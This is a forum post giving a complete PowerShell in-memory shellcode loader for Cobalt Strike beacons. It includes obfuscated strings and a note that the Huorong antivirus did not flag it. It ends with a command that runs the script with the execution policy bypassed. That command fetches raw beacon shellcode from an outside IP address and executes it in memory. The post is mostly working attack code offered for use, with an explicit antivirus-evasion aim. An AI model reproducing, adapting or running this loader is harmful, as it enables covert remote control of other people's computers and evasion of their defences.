Posted on 2021-3-3 10:54:34
This post was last edited by pukr on 2021-3-3 10:56

Getting a remote beacon to check in using a loader

Loader code: save it as jzq.ps1 and upload it to the target machine. Huorong (火绒) did not flag it.
function func_get_delegate_type_new {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )
    # Builds a delegate type at runtime via System.Reflection.Emit (no Add-Type, nothing written to disk)
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
    return $var_type_builder.CreateType()
}

function func_get_proc_address_new {
    Param ($var_module, $var_procedure)
    # Resolves an export address through the GetProcAddress/GetModuleHandle wrappers in System.dll's UnsafeNativeMethods
    $var_unsafe_native_methods = [AppDomain]::CurrentDomain.GetAssemblies()
    $var_unsafe_native_methods_news = ($var_unsafe_native_methods | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods_news.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods_news.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

If ([IntPtr]::size -eq 8) {
    # $args[0] is the URL passed on the command line; the raw beacon is fetched straight into memory
    [Byte[]]$acode = (New-Object Net.WebClient)."Down`l`oadData"($args[0])
    $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address_new kernel32.dll VirtualAlloc), (func_get_delegate_type_new @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
    # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
    $var_buffer = $var_va.Invoke([IntPtr]::Zero, $acode.Length, 0x3000, 0x40)
    [System.Runtime.InteropServices.Marshal]::Copy($acode, 0, $var_buffer, $acode.length)
    $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type_new @([IntPtr]) ([Void])))
    $var_runme.Invoke([IntPtr]::Zero)
}
Then put test.bin, generated by CS 4.0 in raw format, on a cloud host.

Run on the target machine:

powershell -ExecutionPolicy bypass -File jzq.ps1 http://116.62.49.176:8888/pukr/test.bin

CS checks in normally.